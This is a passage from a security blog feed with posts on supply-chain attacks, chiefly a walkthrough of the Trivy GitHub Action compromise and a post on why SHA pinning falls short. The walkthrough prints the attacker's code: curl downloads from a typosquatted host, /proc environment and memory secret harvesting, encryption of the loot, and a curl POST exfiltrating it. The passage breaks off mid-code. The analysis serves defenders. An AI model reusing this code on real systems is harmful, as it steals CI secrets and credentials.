<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="security" /><category term="supply-chain" /><category term="npm" /><summary type="html"><![CDATA[At 00:21 UTC on March 31, someone published axios@1.14.1 to npm. Three hours later it was pulled. In between, every npm install and npx invocation that resolved axios@latest executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here’s what that three-hour window looked like from one developer’s MacBook.]]></summary></entry><entry><title type="html">SHA Pinning Is Not Enough</title><link href="https://rosesecurity.cloud/2026/03/24/sha-pinning-is-not-enough.html" rel="alternate" type="text/html" title="SHA Pinning Is Not Enough" /><published>2026-03-24T00:00:00+00:00</published><updated>2026-03-24T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2026/03/24/sha-pinning-is-not-enough</id><content type="html" xml:base="https://rosesecurity.cloud/2026/03/24/sha-pinning-is-not-enough.html"><![CDATA[<p>A few days ago I wrote about <a href="/2026/03/20/typosquatting-trivy">how the Trivy ecosystem got turned into a credential stealer</a>. One of my takeaways was “pin by SHA.” Every supply chain security guide says it, I’ve said it, every subreddit says it, and the GitHub Actions hardening docs say it.</p>

<p>The Trivy attack proved it wrong, and I think we need to talk about why.</p>

<h2 id="quick-refresher">Quick Refresher</h2>

<p>For anyone not familiar, SHA pinning looks like this:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Tag reference (mutable, dangerous)</span>
<span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v6.0.2</span>

<span class="c1"># SHA-pinned (immutable, safe... right?)</span>
<span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd</span> <span class="c1"># v6.0.2</span>
</code></pre></div></div>

<p>Git tags are just pointers, so anyone with write access can move a tag to a different commit. SHAs are cryptographic hashes of the commit content. You can’t forge one and you can’t move one. Pin to a SHA and you get exactly the code you reviewed, forever.</p>

<p>That logic is correct, but it’s not the whole picture.</p>

<h2 id="what-actually-happened">What Actually Happened</h2>

<p>On March 4, <a href="https://github.com/aquasecurity/trivy/commit/1885610c6a34811c8296416ae69f568002ef11ec">commit <code class="language-plaintext highlighter-rouge">1885610c</code></a> landed in <code class="language-plaintext highlighter-rouge">aquasecurity/trivy</code>. The message said <code class="language-plaintext highlighter-rouge">fix(ci): Use correct checkout pinning</code>, attributed to <code class="language-plaintext highlighter-rouge">DmitriyLewen</code> (a legitimate maintainer). The diff touched two workflow files across 14 lines. Most of it was noise: single quotes swapped for double quotes, a trailing space removed from a <code class="language-plaintext highlighter-rouge">mkdir</code> line. The kind of commit that gets waved through review because there’s nothing to review.</p>

<p>Two lines mattered. The first swapped the <code class="language-plaintext highlighter-rouge">actions/checkout</code> SHA in the release workflow:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
</span><span class="gi">+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2
</span></code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge"># v6.0.2</code> comment stayed. The SHA changed. The second change added <code class="language-plaintext highlighter-rouge">--skip=validate</code> to the GoReleaser invocation, disabling integrity checks on the build artifacts.</p>

<p>The payload lived at the other end of that SHA. <a href="https://github.com/actions/checkout/commit/70379aad1a8b40919ce8b382d3cd7d0315cde1d0">Commit <code class="language-plaintext highlighter-rouge">70379aad</code></a> sits in the <code class="language-plaintext highlighter-rouge">actions/checkout</code> repository as an orphaned commit. Someone had forked <code class="language-plaintext highlighter-rouge">actions/checkout</code>, created a commit with malicious code, and walked away. GitHub’s UI actually flags it with a yellow banner: <em>“This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.”</em> The author is listed as <code class="language-plaintext highlighter-rouge">Guillermo Rauch &lt;rauchg@gmail.com&gt;</code> (spoofed), the commit message references <a href="https://github.com/actions/checkout/pull/2356">PR #2356</a> (a real, closed PR by a GitHub employee), and the commit is unsigned. Every bit of metadata is designed to look routine at a glance.</p>

<p>Here’s the part that should bother you: GitHub’s architecture makes fork commits reachable by SHA from the parent repo. When GitHub Actions resolved <code class="language-plaintext highlighter-rouge">actions/checkout@70379aad...</code>, it fetched the commit, found valid code, and ran it. No warning in the run log. No signal that this commit came from outside the repository’s branch history. As far as the runtime was concerned, it was a totally normal commit in <code class="language-plaintext highlighter-rouge">actions/checkout</code>.</p>

<p>Anyone can do this right now. Fork a popular action, create a commit with whatever code you want, and produce a SHA that GitHub will resolve as if it belongs to the original repository. SHA pinning guarantees you get the same commit every time. It does <em>not</em> guarantee that commit was ever part of the upstream project.</p>

<h2 id="nobody-reads-hex-strings">Nobody Reads Hex Strings</h2>

<p>The malicious checkout replaced <code class="language-plaintext highlighter-rouge">action.yml</code>’s Node.js entrypoint with a composite action that did a legitimate checkout first, then silently pulled down replacements for the Trivy source:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Setup</span><span class="nv"> </span><span class="s">Checkout"</span>
  <span class="na">shell</span><span class="pi">:</span> <span class="s">bash</span>
  <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span>
    <span class="s">BASE="https://scan.aquasecurtiy.org/static"</span>
    <span class="s">curl -sf "$BASE/main.go" -o cmd/trivy/main.go &amp;&gt; /dev/null</span>
    <span class="s">curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &amp;&gt; /dev/null</span>
    <span class="s">curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &amp;&gt; /dev/null</span>
    <span class="s">curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &amp;&gt; /dev/null</span>
    <span class="s">curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &amp;&gt; /dev/null</span>
</code></pre></div></div>

<p>Four Go files from a typosquatted C2, dropped into <code class="language-plaintext highlighter-rouge">cmd/trivy/</code>, replacing the real source. A fifth download replaced <code class="language-plaintext highlighter-rouge">.golangci.yaml</code> to disable linter rules that would have flagged the injected code. GoReleaser ran with validation skipped, built binaries from the poisoned source, and published them as <code class="language-plaintext highlighter-rouge">v0.69.4</code> through Trivy’s own release infrastructure. The malware was compiled in. No runtime download, no shell script, no base64.</p>

<p>But none of that is visible from the Trivy repository side. What a reviewer actually sees is this:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
</span><span class="gi">+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2
</span></code></pre></div></div>

<p>Two 40-character hex strings, both ending with <code class="language-plaintext highlighter-rouge"># v6.0.2</code>. Be honest: you didn’t compare them character by character just now. Neither did anyone reviewing that commit. The version comment is the thing people actually read, and the version comment is just a freeform string that anybody can type.</p>

<p>SHA pinning optimizes for machine verification but falls apart at the moment a human has to review a change. The attacker knew this, which is why the rest of the 14-line diff was cosmetic noise. Hide the important thing behind boring things, and the reviewer’s attention goes to the boring things.</p>

<h2 id="the-comment-that-lied">The Comment That Lied</h2>

<p>There’s a convention that’s emerged with SHA pinning where you put the version tag in a comment next to the SHA so humans can tell what version they’re using:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd</span> <span class="c1"># v6.0.2</span>
</code></pre></div></div>

<p>That comment is free text. Nothing validates it. No tool in the GitHub Actions pipeline checks that the SHA actually corresponds to <code class="language-plaintext highlighter-rouge">v6.0.2</code>. Dependabot and Renovate verify tag-to-SHA mappings when <em>they</em> make updates, but they can’t protect against someone hand-editing a SHA and typing whatever they want in the comment. In this case, the commit came from a maintainer account (or at least one with write access), so it sailed right past branch protection.</p>

<p>The comment <code class="language-plaintext highlighter-rouge"># v6.0.2</code> was the entire social engineering payload on the Trivy repository side. Not a phishing email, not a fake login page. Five characters in a YAML comment that made a reviewer’s brain skip right past the hex string next to it.</p>

<h2 id="what-actually-helps">What Actually Helps</h2>

<p>SHA pinning is still better than tag references. It knocks out one class of attack (tag mutation) entirely. But treating it as “good enough” is where things fall apart.</p>

<p>The fork commit problem is the most immediate thing you can act on. Before you accept a SHA change in a PR, click through to the commit in the target repository. For <code class="language-plaintext highlighter-rouge">actions/checkout@70379aad...</code>, that would have shown GitHub’s yellow “does not belong to any branch” banner. That’s a hard no. Any SHA pin for a GitHub Action should point to a commit that lives on a release branch or tag in the official repo, not an orphaned commit from some fork. You can automate this check with the GitHub API, since <code class="language-plaintext highlighter-rouge">repos/{owner}/{repo}/commits/{sha}/branches-where-head</code> returns an empty list for orphaned commits.</p>

<p>Beyond that, the usual layers apply: require signed commits on workflow file changes, restrict allowed actions at the org level to an explicit allowlist, mirror the actions you depend on into your own org so fork reachability doesn’t apply, and verify build artifact provenance with <a href="https://docs.github.com/en/actions/security-for-github-actions/using-artifact-attestations/using-artifact-attestations-to-establish-provenance-for-builds">artifact attestations</a> rather than trusting whatever came out of CI.</p>

<p>The uncomfortable reality is that no single control would have stopped the Trivy attack. The commit came through a compromised maintainer account, so code review and branch protection were both present and both bypassed. The SHA pointed to a fork commit, so the pin itself was technically valid. GoReleaser validation was explicitly disabled, so the build system’s own integrity checks were stripped. Every control in the pipeline was individually subverted. The attack worked because nothing caught the chain.</p>

<h2 id="this-is-the-floor-not-the-ceiling">This Is the Floor, Not the Ceiling</h2>

<p>After the <code class="language-plaintext highlighter-rouge">tj-actions/changed-files</code> incident in early 2025, the security community converged on SHA pinning as <em>the</em> answer to GitHub Actions supply chain attacks. It was the right call, but it wasn’t the complete answer, and somewhere along the way the nuance got lost. “Pin your SHAs” turned into “pin your SHAs and you’re safe,” which is a very different statement.</p>

<p>Pin your SHAs. Then verify what they point to.</p>

<hr />

<p><em>This is a follow-up to my earlier post on the <a href="/2026/03/20/typosquatting-trivy">Trivy supply chain compromise</a>.</em></p>

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="security" /><category term="supply-chain" /><category term="github-actions" /><summary type="html"><![CDATA[A few days ago I wrote about how the Trivy ecosystem got turned into a credential stealer. One of my takeaways was “pin by SHA.” Every supply chain security guide says it, I’ve said it, every subreddit says it, and the GitHub Actions hardening docs say it.]]></summary></entry><entry><title type="html">How a Typosquatted Domain and a Fake Version Tag Turned Trivy Into a Credential Stealer</title><link href="https://rosesecurity.cloud/2026/03/20/typosquatting-trivy.html" rel="alternate" type="text/html" title="How a Typosquatted Domain and a Fake Version Tag Turned Trivy Into a Credential Stealer" /><published>2026-03-20T00:00:00+00:00</published><updated>2026-03-20T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2026/03/20/typosquatting-trivy</id><content type="html" xml:base="https://rosesecurity.cloud/2026/03/20/typosquatting-trivy.html"><![CDATA[<p>On March 19, 2026, someone (or some group) poisoned the Aqua Security Trivy ecosystem. A tool that thousands of organizations rely on to find vulnerabilities in their container images and configurations was quietly turned into a weapon that stole their secrets instead. I spent some time pulling apart the malicious code and cross-referencing findings from <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack">Wiz’s analysis</a>, and figured the walkthrough was worth sharing. Here’s how it happened (and how a majority of the tech industry ignored the compromise because it was a Friday).</p>

<h2 id="two-days-of-preparation">Two Days of Preparation</h2>

<p>The first sign of what was coming appeared on March 17, when someone registered the domain <code class="language-plaintext highlighter-rouge">aquasecurtiy.org</code> through Spaceship, Inc. It’s “securtiy” with the <code class="language-plaintext highlighter-rouge">i</code> and <code class="language-plaintext highlighter-rouge">t</code> swapped, not “security.” The <code class="language-plaintext highlighter-rouge">.org</code> TLD instead of <code class="language-plaintext highlighter-rouge">.com</code> added another layer of plausible misdirection.</p>

<p>Within fifty minutes of registration, the attacker had Let’s Encrypt certificates issued for <code class="language-plaintext highlighter-rouge">scan.aquasecurtiy.org</code>. The server behind it sat on AS48090, a small network called DMZHOST operated by a UK-registered company with a Gmail abuse contact and IP space flagged to Andorra. The kind of hosting provider that doesn’t ask too many questions about what you’re running.</p>

<p>Two days of infrastructure prep. Then the real work began.</p>

<h2 id="a-legitimate-version-silently-hijacked">A Legitimate Version, Silently Hijacked</h2>

<p><code class="language-plaintext highlighter-rouge">trivy-action</code> <code class="language-plaintext highlighter-rouge">0.34.2</code> was a real release. It shipped in late February with YAML trivyignore support and a Trivy version bump. Organizations adopted it through normal Renovate and Dependabot PRs weeks before anything went wrong.</p>

<p>According to <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack">Wiz’s research</a>, the group behind this (calling themselves “TeamPCP”) had compromised the <code class="language-plaintext highlighter-rouge">aqua-bot</code> service account through residual access from an earlier incident in March 2026 that was never fully contained. With that access, they didn’t just tamper with one tag. They force-pushed 75 of 76 <code class="language-plaintext highlighter-rouge">trivy-action</code> tags and 7 <code class="language-plaintext highlighter-rouge">setup-trivy</code> tags to malicious commits. The <code class="language-plaintext highlighter-rouge">0.34.2</code> tag caused the most damage in the wild because so many organizations had already adopted it as a legitimate upgrade.</p>

<p>On March 19 around 17:43 UTC, the attacker moved the <code class="language-plaintext highlighter-rouge">0.34.2</code> tag. It had pointed to a clean commit; now it resolved to a different one (<code class="language-plaintext highlighter-rouge">ddb9da44</code>) that looked nearly identical to the original. Same author name, same timestamp, same commit message. The attacker had spoofed the commit metadata to impersonate known developers. <code class="language-plaintext highlighter-rouge">DmitriyLewen</code> is a legitimate Aqua Security engineer. <code class="language-plaintext highlighter-rouge">rauchg</code> is Guillermo Rauch, the CEO of Vercel, who has nothing to do with Aqua Security but whose name on a commit touching GitHub Actions plumbing wouldn’t raise an eyebrow. The only differences were the parent chain (it branched off <code class="language-plaintext highlighter-rouge">v0.35.0</code> instead of sitting on the main branch) and the contents of <code class="language-plaintext highlighter-rouge">entrypoint.sh</code>, which now had 105 lines of malicious code prepended to the legitimate Trivy logic.</p>

<p>This is the fundamental problem with Git tags: they’re just pointers. You can move them whenever you want, and anyone pulling that tag gets whatever it points to now, not what it pointed to yesterday. Every organization that had already pinned to <code class="language-plaintext highlighter-rouge">0.34.2</code> silently started pulling the attacker’s code with no change on their end.</p>

<h2 id="walking-through-the-malicious-code">Walking Through the Malicious Code</h2>

<p>What makes this attack worth studying is its transparency. The 105 lines of malicious shell ran first, then handed off to the real Trivy scanner. Workflows completed successfully. Scans produced normal output. Nothing looked wrong unless you knew exactly where to look.</p>

<p>Here’s the actual injected code.</p>

<h3 id="phase-1-harvesting-runner-process-environments">Phase 1: Harvesting Runner Process Environments</h3>

<p>The first thing the payload does is find every GitHub Actions runner process on the box and read its environment variables straight out of <code class="language-plaintext highlighter-rouge">/proc</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">_COLLECT_PIDS</span><span class="o">=</span><span class="s2">"$"</span>
<span class="k">for </span>_name <span class="k">in </span>Runner.Worker Runner.Listener runsvc run.sh<span class="p">;</span> <span class="k">do
  </span><span class="nv">_PIDS</span><span class="o">=</span><span class="si">$(</span>pgrep <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$_name</span><span class="s2">"</span> 2&gt;/dev/null <span class="o">||</span> <span class="nb">true</span><span class="si">)</span>
  <span class="o">[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$_PIDS</span><span class="s2">"</span> <span class="o">]</span> <span class="o">&amp;&amp;</span> <span class="nv">_COLLECT_PIDS</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_COLLECT_PIDS</span><span class="s2"> </span><span class="nv">$_PIDS</span><span class="s2">"</span>
<span class="k">done

</span><span class="nv">COLLECTED</span><span class="o">=</span><span class="s2">"/tmp/runner_collected_</span><span class="nv">$.</span><span class="s2">txt"</span>
: <span class="o">&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>

<span class="k">for </span>_PID <span class="k">in</span> <span class="nv">$_COLLECT_PIDS</span><span class="p">;</span> <span class="k">do
  </span><span class="nv">_ENVIRON</span><span class="o">=</span><span class="s2">"/proc/</span><span class="k">${</span><span class="nv">_PID</span><span class="k">}</span><span class="s2">/environ"</span>
  <span class="o">[</span> <span class="nt">-r</span> <span class="s2">"</span><span class="nv">$_ENVIRON</span><span class="s2">"</span> <span class="o">]</span> <span class="o">||</span> <span class="k">continue
  while </span><span class="nv">IFS</span><span class="o">=</span> <span class="nb">read</span> <span class="nt">-r</span> line<span class="p">;</span> <span class="k">do
    </span><span class="nv">key</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">line</span><span class="p">%%=*</span><span class="k">}</span><span class="s2">"</span>
    <span class="nv">val</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">line</span><span class="p">#*=</span><span class="k">}</span><span class="s2">"</span>
    <span class="k">if </span><span class="nb">echo</span> <span class="s2">"</span><span class="nv">$key</span><span class="s2">"</span> | <span class="nb">grep</span> <span class="nt">-qiE</span> <span class="s1">'(env|ssh)'</span><span class="p">;</span> <span class="k">then
      </span><span class="nb">printf</span> <span class="s1">'%s=%s\n'</span> <span class="s2">"</span><span class="nv">$key</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
      <span class="k">if</span> <span class="o">[</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">]</span> <span class="o">&amp;&amp;</span> <span class="o">[</span> <span class="o">!</span> <span class="nt">-S</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
        </span><span class="nb">printf</span> <span class="s1">'\n[%s]\n'</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
        <span class="nb">cat</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
        <span class="nb">printf</span> <span class="s1">'\n'</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
      <span class="k">fi
    fi
  done</span> &lt; &lt;<span class="o">(</span><span class="nb">tr</span> <span class="s1">'\0'</span> <span class="s1">'\n'</span> &lt; <span class="s2">"</span><span class="nv">$_ENVIRON</span><span class="s2">"</span><span class="o">)</span>
<span class="k">done</span>
</code></pre></div></div>

<p>It searches for four process names (<code class="language-plaintext highlighter-rouge">Runner.Worker</code>, <code class="language-plaintext highlighter-rouge">Runner.Listener</code>, <code class="language-plaintext highlighter-rouge">runsvc</code>, and <code class="language-plaintext highlighter-rouge">run.sh</code>) which cover every flavor of the GitHub Actions runner agent. For each one it finds, it reads <code class="language-plaintext highlighter-rouge">/proc/PID/environ</code>, which on Linux contains all of a process’s environment variables as null-delimited bytes. The <code class="language-plaintext highlighter-rouge">tr '\0' '\n'</code> converts those null bytes into newlines so the shell can iterate over them.</p>

<p>Then it gets clever. It doesn’t grab every variable. It filters for keys matching <code class="language-plaintext highlighter-rouge">env</code> or <code class="language-plaintext highlighter-rouge">ssh</code>, which catches things like <code class="language-plaintext highlighter-rouge">SSH_PRIVATE_KEY</code>, <code class="language-plaintext highlighter-rouge">ENV_FILE</code>, or anything a developer might have named with those substrings. And here’s the part that shows someone thought about this: if the <em>value</em> of an environment variable is a path to a file on disk, the script reads that file’s contents too. So if you have <code class="language-plaintext highlighter-rouge">SSH_KEY_PATH=/home/runner/.ssh/id_ed25519</code>, it doesn’t just log the path. It cats the actual private key into the collection file.</p>

<h3 id="phase-2-the-fork">Phase 2: The Fork</h3>

<p>After the environment harvest, the code branches based on where it’s running:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="o">[[</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">uname</span><span class="si">)</span><span class="s2">"</span> <span class="o">==</span> <span class="s2">"Linux"</span> <span class="o">&amp;&amp;</span> <span class="s2">"</span><span class="nv">$RUNNER_ENVIRONMENT</span><span class="s2">"</span> <span class="o">==</span> <span class="s2">"github-hosted"</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then
    </span><span class="nv">PYTHON_STR</span><span class="o">=</span><span class="s1">'aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJl...'</span>
    <span class="nv">MEMORY_SECRETS</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$PYTHON_STR</span><span class="s2">"</span> | <span class="nb">base64</span> <span class="nt">-d</span> | <span class="nb">sudo </span>python3 | <span class="se">\</span>
      <span class="nb">tr</span> <span class="nt">-d</span> <span class="s1">'\0'</span> | <span class="se">\</span>
      <span class="nb">grep</span> <span class="nt">-aoE</span> <span class="s1">'"[^"]+":\{"value":"[^"]*","isSecret":true\}'</span> | <span class="nb">sort</span> <span class="nt">-u</span><span class="si">)</span>
    <span class="nb">printf</span> <span class="s1">'%s=%s\n'</span> <span class="s2">"MEMORY_PARSE"</span> <span class="s2">"</span><span class="nv">$MEMORY_SECRETS</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
<span class="k">else
    </span><span class="nv">PYTHON_STR</span><span class="o">=</span><span class="s1">'aW1wb3J0IG9zLHN5cyxzdGF0LHN1YnByb2Nlc3Ms...'</span>
    <span class="nv">SHELL_RUNNER_GOODIES</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$PYTHON_STR</span><span class="s2">"</span> | <span class="nb">base64</span> <span class="nt">-d</span> | python3<span class="si">)</span>
    <span class="nb">printf</span> <span class="s1">'%s=%s\n'</span> <span class="s2">"SHELL_GOODIES"</span> <span class="s2">"</span><span class="nv">$SHELL_RUNNER_GOODIES</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
<span class="k">fi</span>
</code></pre></div></div>

<p>Both paths hide their real logic inside base64-encoded Python payloads, a straightforward way to avoid static detection from anyone grepping the action source for suspicious keywords.</p>

<p><strong>On GitHub-hosted runners</strong>, the decoded Python does something audacious. It walks <code class="language-plaintext highlighter-rouge">/proc</code> looking for the <code class="language-plaintext highlighter-rouge">Runner.Worker</code> process, then reads its memory map from <code class="language-plaintext highlighter-rouge">/proc/PID/maps</code> to find all readable memory regions, and reads the raw bytes out of <code class="language-plaintext highlighter-rouge">/proc/PID/mem</code>. It runs under <code class="language-plaintext highlighter-rouge">sudo</code> because accessing another process’s memory requires elevated privileges. The output gets piped through a regex that matches GitHub Actions’ internal secret storage format: <code class="language-plaintext highlighter-rouge">"SECRET_NAME":{"value":"the_actual_secret","isSecret":true}</code>. That’s how the runner keeps track of masked secrets in memory. Those <code class="language-plaintext highlighter-rouge">***</code> masks in your logs? The actual values are right there in the runner process’s heap, and this script knows exactly what pattern to look for.</p>

<p><strong>On self-hosted runners</strong>, the decoded Python is a comprehensive filesystem stealer. It’s long (really long) because it has hardcoded paths for basically every credential file that might exist on a Linux machine. When decoded from base64, it defines helper functions for reading files (<code class="language-plaintext highlighter-rouge">emit</code>), running commands (<code class="language-plaintext highlighter-rouge">run</code>), and walking directory trees (<code class="language-plaintext highlighter-rouge">walk</code>), then systematically works through SSH keys and configs from every home directory and <code class="language-plaintext highlighter-rouge">/etc/ssh</code>, git credentials, AWS/GCP/Azure credentials, every flavor of <code class="language-plaintext highlighter-rouge">.env</code> file walking up to 6 directories deep, cloud IMDS endpoints for both ECS and EC2, Kubernetes configs and service account tokens, Docker configs (including the Kaniko-specific path at <code class="language-plaintext highlighter-rouge">/kaniko/.docker/config.json</code>), NPM tokens, Vault tokens, database credentials for MySQL/PostgreSQL/MongoDB/Redis, WireGuard configs, Terraform <code class="language-plaintext highlighter-rouge">.tfvars</code> and <code class="language-plaintext highlighter-rouge">.tfstate</code> files, TLS private keys, Slack and Discord webhook URLs, and cryptocurrency wallets for Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero, Ethereum, Cardano, and Solana. It also grabs <code class="language-plaintext highlighter-rouge">/etc/passwd</code>, <code class="language-plaintext highlighter-rouge">/etc/shadow</code>, and auth logs for good measure.</p>

<p>The script ends with the comment <code class="language-plaintext highlighter-rouge">## TeamPCP Cloud stealer</code>.</p>

<h3 id="phase-3-encrypt-and-exfiltrate">Phase 3: Encrypt and Exfiltrate</h3>

<p>Once the collection phase finishes, the payload only continues if it actually found something (<code class="language-plaintext highlighter-rouge">-s "$COLLECTED"</code> checks the file isn’t empty). Then it sets up a hybrid encryption scheme:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="o">[</span> <span class="nt">-s</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
  </span><span class="nv">_PUB_KEY_PEM</span><span class="o">=</span><span class="s2">"</span><span class="si">$(</span><span class="nb">mktemp</span><span class="si">)</span><span class="s2">"</span>
  <span class="nb">cat</span> <span class="o">&gt;</span> <span class="s2">"</span><span class="nv">$_PUB_KEY_PEM</span><span class="s2">"</span> <span class="o">&lt;&lt;</span><span class="sh">'</span><span class="no">PUBKEY</span><span class="sh">'
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
...
-----END PUBLIC KEY-----
</span><span class="no">PUBKEY

</span>  <span class="nv">_WORKDIR</span><span class="o">=</span><span class="s2">"</span><span class="si">$(</span><span class="nb">mktemp</span> <span class="nt">-d</span><span class="si">)</span><span class="s2">"</span>
  <span class="nv">_SESSION_KEY</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">/session.key"</span>
  <span class="nv">_ENC_FILE</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">/payload.enc"</span>
  <span class="nv">_ENC_KEY</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">/session.key.enc"</span>
  <span class="nv">_BUNDLE</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">/tpcp.tar.gz"</span>

  openssl rand 32 <span class="o">&gt;</span> <span class="s2">"</span><span class="nv">$_SESSION_KEY</span><span class="s2">"</span> 2&gt;/dev/null
  openssl enc <span class="nt">-aes-256-cbc</span> <span class="nt">-in</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span> <span class="nt">-out</span> <span class="s2">"</span><span class="nv">$_ENC_FILE</span><span class="s2">"</span> <span class="se">\</span>
    <span class="nt">-pass</span> <span class="s2">"file:</span><span class="nv">$_SESSION_KEY</span><span class="s2">"</span> <span class="nt">-pbkdf2</span> 2&gt;/dev/null
  openssl pkeyutl <span class="nt">-encrypt</span> <span class="nt">-pubin</span> <span class="nt">-inkey</span> <span class="s2">"</span><span class="nv">$_PUB_KEY_PEM</span><span class="s2">"</span> <span class="se">\</span>
    <span class="nt">-in</span> <span class="s2">"</span><span class="nv">$_SESSION_KEY</span><span class="s2">"</span> <span class="nt">-out</span> <span class="s2">"</span><span class="nv">$_ENC_KEY</span><span class="s2">"</span> <span class="se">\</span>
    <span class="nt">-pkeyopt</span> rsa_padding_mode:oaep 2&gt;/dev/null
  <span class="nb">tar</span> <span class="nt">-czf</span> <span class="s2">"</span><span class="nv">$_BUNDLE</span><span class="s2">"</span> <span class="nt">-C</span> <span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">"</span> payload.enc session.key.enc 2&gt;/dev/null
</code></pre></div></div>

<p>Textbook, a random 32-byte AES session key encrypts the collected data. Then the session key itself gets encrypted with the attacker’s embedded RSA-4096 public key using OAEP padding. Both ciphertext files get tarred into <code class="language-plaintext highlighter-rouge">tpcp.tar.gz</code>. Only someone holding the corresponding RSA private key can reverse this. Even if you intercept the bundle on the wire, the contents are opaque.</p>

<h3 id="phase-4-phone-home-with-a-backup-plan">Phase 4: Phone Home (with a Backup Plan)</h3>

<p>The exfiltration has a primary and fallback channel:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="nv">_HTTP</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-o</span> /dev/null <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="nt">-X</span> POST <span class="se">\</span>
    https://scan.aquasecurtiy.org <span class="se">\</span>
    <span class="nt">-H</span> <span class="s2">"Content-Type: application/octet-stream"</span> <span class="se">\</span>
    <span class="nt">-H</span> <span class="s2">"X-Filename: tpcp.tar.gz"</span> <span class="se">\</span>
    <span class="nt">--data-binary</span> <span class="s2">"@</span><span class="k">${</span><span class="nv">_BUNDLE</span><span class="k">}</span><span class="s2">"</span> 2&gt;/dev/null <span class="o">||</span> <span class="nb">echo</span> <span class="s2">"000"</span><span class="si">)</span>

